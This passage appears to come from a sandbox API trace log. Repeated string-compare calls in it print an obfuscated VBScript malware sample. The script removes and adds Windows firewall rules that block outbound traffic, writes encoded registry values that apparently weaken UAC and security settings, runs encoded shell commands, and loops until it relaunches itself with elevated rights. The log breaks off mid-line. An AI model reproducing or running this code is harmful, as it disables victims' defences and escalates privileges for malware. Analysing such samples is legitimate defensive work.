rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.334] wcsncmp (_String1="ct(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.334] wcsncmp (_String1="t(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.334] wcsncmp (_String1="(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.334] wcsncmp (_String1="bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 